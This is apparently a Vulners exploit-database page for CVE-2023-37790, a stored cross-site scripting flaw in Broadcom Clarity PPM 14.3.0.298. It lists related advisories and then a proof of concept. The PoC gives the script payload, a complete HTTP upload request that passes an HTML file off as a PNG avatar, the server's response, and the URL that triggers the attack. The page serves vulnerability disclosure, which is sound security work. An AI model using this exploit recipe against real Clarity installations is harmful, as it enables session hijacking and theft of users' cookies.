Vulners
Lucene search
Clarity PPM 14.3.0.298 Cross Site Scripting
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2023-37790 | 9 Nov 202300:15 | – | attackerkb |
 | Broadcom CA Clarity Cross-Site Scripting Vulnerability | 8 Nov 202300:00 | – | cnnvd |
 | CVE-2023-37790 | 8 Nov 202300:00 | – | cve |
 | CVE-2023-37790 | 8 Nov 202300:00 | – | cvelist |
 | EUVD-2023-41664 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-37790 | 9 Nov 202300:15 | – | nvd |
 | CVE-2023-37790 | 9 Nov 202300:15 | – | osv |
 | Design/Logic Flaw | 9 Nov 202300:15 | – | prion |
 | PT-2023-26110 · Jaspersoft · Jaspersoft Clarity Ppm | 8 Nov 202300:00 | – | ptsecurity |
 | CVE-2023-37790 | 23 May 202504:05 | – | redhatcve |
10
`==================================================================================================================================
# Title : Insufficient input validation , in CA PPM 14.3 allows remote attackers to execute stored cross-site scripting attacks. |
# Author : Kaizen |
# Tested on : windows 10 / browser : Chrome Version 114.0.5735.133 (Official Build) (x86_64) |
# Vendor : https://www.broadcom.com/
# Dork : https://www.broadcom.com/products/software/value-stream-management/clarity |
#Affected Product Version: Clarity PPM 14.3.0.298 / Jaspersoft
#CVE Assigned: CVE-2023-37790
==================================================================================================================================
POC:
Header: Content-Type: text/html; charset=utf-8
Payload: <body onload=alert(document.cookie)>
HTTP Request:
POST /niku/nu?uitk.vxml.form=1&action=projmgr.avatarPhotoUpload&2097152&Error%20CMN-01035:%20The%20file%20size%20exceeds%202%20MB%20limit%20or%20file%20type%20is%20not%20supported.%20Please%20try%20again.&uitk.navigation.location=Modal&uitk.navigation.parent.location=Modal&uitk.navigation.last.workspace.action=npt.overview HTTP/1.1
[REDACTED]
------WebKitFormBoundaryr7Mas24AkgGJH4HE
Content-Disposition: form-data; name="avatar_photo"
------WebKitFormBoundaryr7Mas24AkgGJH4HE
Content-Disposition: form-data; name="avatar_photo_ODF_New_Attachment_File_Name"; filename="payload.png"
Content-Type: text/html; charset=utf-8
<body onload=alert(document.cookie)>
------WebKitFormBoundaryr7Mas24AkgGJH4HE
Content-Disposition: form-data; name="superSecretTokenKey"
superSecretTokenValue
------WebKitFormBoundaryr7Mas24AkgGJH4HE--
HTTP Response:
HTTP/1.1 200 OK
content-disposition: inline;filename="payload.png"
Content-Type: text/html;charset=utf-8
Content-Length: 90
Date: Thu, 06 Jul 2023 07:33:24 GMT
Connection: close
Server: CA PPM
<body onload=alert(document.cookie)>
To Trigger Stored XSS visit user profile picture.
https://127.0.0.1/niku/app?action=union.viewODFFile&objectType=resource&odf_pk=5763513&fileId=5178985&versionId=51[REDACTED]hXm0r7tSeUqEr=true
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jul 2023 00:00Current
7.1High risk
Vulners AI Score7.1
EPSS0.0014